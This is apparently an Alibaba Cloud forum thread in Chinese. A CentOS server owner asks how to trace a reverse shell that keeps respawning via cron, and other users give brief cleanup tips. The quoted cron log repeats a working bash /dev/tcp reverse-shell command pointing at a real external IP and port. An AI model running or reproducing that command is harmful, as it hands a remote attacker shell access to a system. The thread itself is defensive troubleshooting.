阿里云
发表主题 回复主题
  • 1544阅读
  • 3回复

[求助]反弹SHELL如何清除

级别: 新人
发帖
1
云币
2
大家好,最近我们的CENTOS服务器中了反弹SHELL。幸好我们有防火墙。反弹SHELL无法兴风作浪。但是我们KILL掉反弹SHELL的进程,他还是会继续起来。而且由于反弹SHELL无法连接远程服务(因为防火墙挡住了),一直在重启连接。 %-$ :/ N  
我们查看了计划任务crontab -l .没有发现任何异常。但是在cron的日志里面,就发现了反弹SHELL的启动日志。如下: pO fw *lD  
  1. Apr 10 08:23:01 iZgw82jiymwc5j3yi9fjg3Z CROND[2841]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  2. Apr 10 08:24:01 iZgw82jiymwc5j3yi9fjg3Z CROND[3716]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  3. Apr 10 08:25:01 iZgw82jiymwc5j3yi9fjg3Z CROND[9405]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  4. Apr 10 08:26:01 iZgw82jiymwc5j3yi9fjg3Z CROND[10350]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  5. Apr 10 08:27:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11148]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  6. Apr 10 08:28:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11890]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  7. Apr 10 08:29:01 iZgw82jiymwc5j3yi9fjg3Z CROND[12568]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
但是再去仔细看crontab -l.里面也没有找到这个命令。请问如何能够找到这个日志里面的执行脚本或者执行命令的位置,谢谢 6Y6t.j0vN.  
q&3(yhx  
级别: 论坛版主
发帖
13530
云币
30967

只看该作者 沙发  发表于: 04-15
楼主您好, rt+4-WuK>  
@Go_5X(  
是否可能在文件系统里搜索某些关键字符(如IP地址),看是否能搜索到包含这些关键字符的文件?
Debian 是一个自由的操作系统 (OS),提供您安装在计算机上使用。操作系统就是能让您的计算机工作的一系列基本程序和实用工具。
级别: 新人
发帖
1
云币
1
只看该作者 板凳  发表于: 05-10
Re反弹SHELL如何清除
我也是整天反弹 不知道怎么排查
级别: 菜鸟
发帖
62
云币
92
只看该作者 地板  发表于: 05-12
检查自启动进程 非系统和自己安装的都 kill -9掉 e_;%F`  
关闭 非安全的 tty连接 QYFN:XZ  
删除 非法用户
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
批量上传需要先选择文件,再选择上传
 
验证问题: ECS是阿里云提供的什么服务? 正确答案:云服务器
上一个 下一个